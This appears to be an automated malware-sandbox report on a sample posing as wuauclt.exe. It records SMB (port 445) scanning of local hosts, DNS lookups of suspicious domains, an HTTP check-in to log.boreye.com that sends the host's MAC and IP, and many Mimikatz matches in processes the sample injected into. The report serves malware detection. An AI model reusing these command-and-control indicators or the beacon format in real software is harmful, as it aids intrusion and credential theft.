      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.34 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.37 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.36 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.17 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.16 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.19 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.18 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.20 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.22 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.21 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.24 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.23 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.26 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.25 445
      Source: C:\Windows\SysWOW64\svchost.exeDomain query: r.affordblue.com
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.49 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.53 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.52 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.11 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.55 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeDomain query: load.affordblue.com
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.10 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.54 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.13 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.57 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.12 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.56 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.15 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.59 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.14 445
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.58 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.51 445Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bk.estonine.com
      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.168.2.50 445Jump to behavior
      Uses ping.exe to check the status of other devices and networks
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 5
      Source: global trafficHTTP traffic detected: GET /ipc.html?mac=EC:F4:BB:EA:15:88&ip=192.168.2.4&host=581804&tick=71min&c=Install_Done HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)Host: log.boreye.comCache-Control: no-cache
      Source: global trafficTCP traffic: 192.168.2.4:49935 -> 72.52.178.23:53
      Source: global trafficTCP traffic: 192.168.2.4:49786 -> 72.52.178.23:53
      Source: global trafficTCP traffic: 192.168.2.4:49939 -> 72.52.178.23:53
      Source: global trafficTCP traffic: 192.168.2.4:50183 -> 72.52.178.23:53
      Source: global trafficTCP traffic: 192.168.2.4:50094 -> 72.52.178.23:53
      Source: global trafficTCP traffic: 192.168.2.4:50121 -> 72.52.178.23:53
      Source: global trafficTCP traffic: 192.168.2.4:50275 -> 72.52.178.23:53
      Source: global trafficTCP traffic: 192.168.2.4:50244 -> 72.52.178.23:53
      Source: global trafficTCP traffic: 192.168.2.4:50067 -> 72.52.178.23:53
      Source: global trafficTCP traffic: 192.168.2.4:50243 -> 72.52.178.23:53
      Source: global trafficTCP traffic: 192.168.2.4:50006 -> 72.52.178.23:53
      Source: global trafficTCP traffic: 192.168.2.4:49881 -> 72.52.178.23:53
      Source: global trafficTCP traffic: 192.168.2.4:50007 -> 72.52.178.23:53
      Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
      Source: Joe Sandbox ViewIP Address: 72.52.178.23 72.52.178.23
      Source: svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
      Source: svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
      Source: svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
      Source: svchost.exe, 00000026.00000003.915409507.0000023E0777F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915837601.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.915614934.0000023E077C1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.916050131.0000023E077A1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
      Source: svchost.exe, 00000026.00000003.917440832.0000023E07757000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report
      Source: svchost.exe, 00000026.00000003.917440832.0000023E07757000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.917806512.0000023E07C43000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000026.00000003.917507723.0000023E0778D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
      Source: unknownDNS traffic detected: queries for: log.boreye.com
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00256450 InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetOpenA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,InternetReadFile,HttpQueryInfoA,0_2_00256450
      Source: global trafficHTTP traffic detected: GET /ipc.html?mac=EC:F4:BB:EA:15:88&ip=192.168.2.4&host=581804&tick=71min&c=Install_Done HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)Host: log.boreye.comCache-Control: no-cache
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_002546E0 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,0_2_002546E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_6FD53DF0 CryptAcquireContextW,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureW,CryptDestroyHash,CryptReleaseContext,2_2_6FD53DF0
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00964920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,15_2_00964920
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 21_2_02FA4920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,21_2_02FA4920
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_02864920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,23_2_02864920
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: 24_2_02E04920 CryptAcquireContextA,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureA,CryptDestroyHash,CryptReleaseContext,24_2_02E04920

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 23.2.dllhost.exe.28a2c68.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.60.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.18.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.7c7468.4.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.0.svchost.exe.8d7468.4.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.0.svchost.exe.862c68.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 28.2.WUDHostServices.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.0.dllhost.exe.2e42c68.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.0.SearchProtocolHost.exe.2fd7468.4.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.2897468.4.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.0.SearchProtocolHost.exe.2fd7468.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.47.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.26.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.2.dllhost.exe.28a2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.0.dllhost.exe.2e42c68.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.57c2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.997468.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.39.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.522c68.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b42000.34.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.0.svchost.exe.8a0000.3.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.6.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.2.SearchProtocolHost.exe.2fa0000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b42000.3.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.7.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.35.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.0.svchost.exe.857468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.2.SearchProtocolHost.exe.2fd7468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.0.dllhost.exe.2e37468.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.38.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.17.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.33.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.0.svchost.exe.8d7468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.2860000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.15.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.0.dllhost.exe.2e37468.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.36.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.0.svchost.exe.857468.4.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.9a2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b42000.25.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.2.dllhost.exe.2860000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.2.svchost.exe.4b42000.4.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.11.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.57.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.59.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.4.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.960000.3.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.14.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.18.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.48.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.0.dllhost.exe.2e00000.3.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.38.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.0.svchost.exe.862c68.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.2.ctfmon.exe.790000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.0.ctfmon.exe.792c68.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.2.svchost.exe.8a0000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.2.dllhost.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.0.SearchProtocolHost.exe.2fa0000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.0.SearchProtocolHost.exe.2fd7468.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 30.0.WUDHostServices.exe.3e0000.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.2.svchost.exe.4b82a68.6.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.0.SearchProtocolHost.exe.2fe2c68.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.2.ctfmon.exe.792c68.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.7d2c68.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.0.ctfmon.exe.750000.3.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 28.0.WUDHostServices.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.2.SearchProtocolHost.exe.2fe2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.0.SearchProtocolHost.exe.2fe2c68.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.0.SearchProtocolHost.exe.2fd7468.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.0.svchost.exe.857468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.49.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.960000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.2.ctfmon.exe.792c68.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.36.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.41.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.2.svchost.exe.4e0000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.28a2c68.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.28a2c68.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.24.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.2.ctfmon.exe.997468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.2.ctfmon.exe.960000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.14.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.2.dllhost.exe.2e42c68.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.517468.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.0.svchost.exe.8e2c68.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.21.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.44.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.0.ctfmon.exe.787468.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f37468.29.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.60.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.57b7468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.0.ctfmon.exe.792c68.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 30.0.WUDHostServices.exe.3e0000.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.31.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.0.ctfmon.exe.787468.4.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.2.dllhost.exe.2e37468.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.20.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.997468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.0.ctfmon.exe.9a2c68.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.2.ctfmon.exe.9a2c68.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b82a68.53.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.0.ctfmon.exe.750000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 15.2.ctfmon.exe.9a2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.27.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.2.svchost.exe.8d7468.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.517468.4.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.5.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 39.0.WUDHostServices.exe.1270000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.0.svchost.exe.820000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.2.ctfmon.exe.7c7468.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.2.svchost.exe.522c68.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.2.dllhost.exe.2e42c68.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.0.ctfmon.exe.790000.3.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.2.svchost.exe.4b77268.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.0.svchost.exe.517468.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 21.2.SearchProtocolHost.exe.2fe2c68.1.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.54.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b77268.21.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f00000.28.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.2.svchost.exe.862c68.2.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 39.2.WUDHostServices.exe.1270000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.0.dllhost.exe.2e42c68.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 27.2.svchost.exe.517468.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4b42000.13.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.2.svchost.exe.857468.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.24.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.28a2c68.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 35.2.svchost.exe.862c68.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 24.0.dllhost.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 33.2.ctfmon.exe.7d2c68.2.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 30.2.WUDHostServices.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.0.svchost.exe.8e2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 30.0.WUDHostServices.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 32.0.ctfmon.exe.787468.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 2.3.svchost.exe.4f42c68.17.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 23.0.dllhost.exe.2897468.4.raw.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
      Source: 29.0.svchost.exe.8e2c68.5.unpack, type: UNPACKEDPEMatched rule: Mimikatz credential dump tool: Author copywrite Author: @fusionrace
